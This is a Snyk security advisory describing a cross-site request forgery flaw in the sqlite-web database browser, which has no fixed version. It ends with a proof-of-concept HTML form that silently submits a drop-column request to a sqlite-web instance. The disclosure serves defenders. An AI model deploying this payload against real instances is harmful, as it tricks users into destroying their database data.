Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
- Snyk ID SNYK-PYTHON-SQLITEWEB-1316324
- published 6 Sep 2021
- disclosed 9 Jul 2021
- credit Yadhu Krishna M
How to fix?
There is no fixed version for
sqlite-web is a Web-based SQLite database browser.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). The SQL dashboard area allows sensitive actions to be performed without validating that the request originated from the application. This could enable an attacker to trick a user into performing these actions unknowingly through a Cross Site Request Forgery (CSRF) attack.
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://your-sqlite-web-instance:8080/sss/drop-column/"><table><tr><td>name</td><td><input type="text" value="id" name="name"></td></tr> </table><input type="submit" value="http://dvws.local:8080/sss/drop-column/"></form></html>